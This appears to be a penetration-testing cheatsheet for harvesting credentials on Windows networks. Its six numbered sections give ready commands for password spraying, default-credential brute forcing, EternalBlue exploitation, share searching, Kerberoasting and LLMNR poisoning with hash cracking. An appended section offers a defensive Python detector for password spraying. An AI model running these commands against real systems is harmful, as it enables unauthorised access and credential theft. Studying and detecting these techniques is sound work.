
Getting Credentials


Last updated 6 months ago

  1. Password Spraying
     Description: Attempt a single password across multiple user accounts to avoid account lockout.
     Tools/Commands:

    • CrackMapExec: crackmapexec smb <IP> -u users.txt -p "Password123"

    • Hydra: hydra -L users.txt -p "Password123" smb://<IP>

    • Metasploit: auxiliary/scanner/smb/smb_login

  2. Default Passwords (Tomcat, Jenkins, etc.)
     Description: Check for default or weak credentials on services or applications.
     Tools/Commands:

    • nmap --script http-default-accounts -p <port> <IP>

    • hydra -l admin -P passwords.txt http-get://<IP>

    • Online default password repositories (e.g., default creds on GitHub)

  3. Missing Patches
     Description: Identify and exploit unpatched vulnerabilities in services or systems.
     Tools/Commands:

    • Nessus/Qualys for vulnerability scanning.

    • Metasploit: use exploit/windows/smb/ms17_010_eternalblue

    • nmap --script vuln <IP>

  4. Cleartext Passwords on File Shares
     Description: Look for files on shared folders containing plaintext credentials.
     Tools/Commands:

    • PowerShell: Get-ChildItem \\<IP>\share -Recurse | Select-String -Pattern "password"

    • SMBClient: smbclient //<IP>/<share> -U <username>

    • CrackMapExec: crackmapexec smb <IP> -u <USER> -p <PASS> --shares

  5. Kerberoasting
     Description: Request service tickets for SPNs and crack them offline to recover passwords.
     Tools/Commands:

    • Impacket: GetUserSPNs.py -request -dc-ip <IP> <DOMAIN>/<USER>

    • Rubeus: Rubeus.exe kerberoast

    • John the Ripper: john --format=krb5tgs hash.txt

  6. LLMNR and NetBIOS Poisoning
     Description: Exploit LLMNR/NetBIOS to capture and relay NTLMv2 hashes.
     Tools/Commands:

    • Responder: responder -I <interface>

    • Inveigh: Invoke-Inveigh

    • Hashcat: hashcat -m 5600 hash.txt wordlist.txt
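A defender-side example added here, not part of the original cheatsheet: a detector for the trace that password spraying (item 1 above) leaves in Windows Security logs, namely failed logons (EventID 4625) from one source against many distinct accounts with only one or two tries each, which is what separates a spray from brute force against a single account. The event layout, the thresholds and the sample events are constructed assumptions.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# Constructed sample of Windows Security events as (timestamp, EventID, source IP,
# target account); 4625 = failed logon, 4624 = successful logon. Not real log data.
SAMPLE_EVENTS = [
    ("2024-05-01T09:00:01", 4625, "10.0.0.5", "alice"),
    ("2024-05-01T09:00:02", 4625, "10.0.0.5", "bob"),
    ("2024-05-01T09:00:03", 4625, "10.0.0.5", "carol"),
    ("2024-05-01T09:00:04", 4625, "10.0.0.5", "dave"),
    ("2024-05-01T09:00:05", 4625, "10.0.0.5", "erin"),
    ("2024-05-01T09:00:06", 4625, "10.0.0.5", "Frank"),
    ("2024-05-01T09:00:07", 4624, "10.0.0.5", "frank"),  # the spray found a hit
    ("2024-05-01T09:01:00", 4625, "10.0.0.9", "grace"),  # one user mistyping a password
    ("2024-05-01T09:01:10", 4625, "10.0.0.9", "grace"),
    ("2024-05-01T09:01:20", 4625, "10.0.0.9", "grace"),
    ("2024-05-01T09:01:30", 4624, "10.0.0.9", "grace"),
    ("2024-05-01T09:02:00", 4625, "10.0.0.7", "bob"),    # single stray failure
]

def parse_events(raw):
    """ISO timestamps to datetime; account names lower-cased so Frank == frank."""
    return [(datetime.fromisoformat(ts), eid, ip, user.lower()) for ts, eid, ip, user in raw]

def detect_password_spray(events, window=timedelta(minutes=10),
                          min_users=5, max_failures_per_user=2):
    """Flag source IPs whose 4625s inside one sliding window hit >= min_users distinct
    accounts with <= max_failures_per_user tries each. Many accounts, few tries per
    account is the spray signature; the per-user cap is what separates it from brute
    force on a single account. Returns {source_ip: sorted targeted accounts}."""
    failures = defaultdict(list)
    for ts, eid, ip, user in events:
        if eid == 4625:
            failures[ip].append((ts, user))
    alerts = {}
    for ip, attempts in failures.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):  # window anchored at each failure
            per_user = Counter(u for ts, u in attempts[i:] if ts - start <= window)
            if len(per_user) >= min_users and max(per_user.values()) <= max_failures_per_user:
                alerts[ip] = sorted(per_user)
                break
    return alerts

def compromised_after_spray(events, alerts):
    """Accounts with a successful logon (4624) from a flagged source: reset these first."""
    return sorted({u for _, eid, ip, u in events if eid == 4624 and u in alerts.get(ip, ())})
```

On the sample data only 10.0.0.5 is flagged (grace's three failures stay below the account threshold), and frank's successful logon from that source is the account to reset and investigate first.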
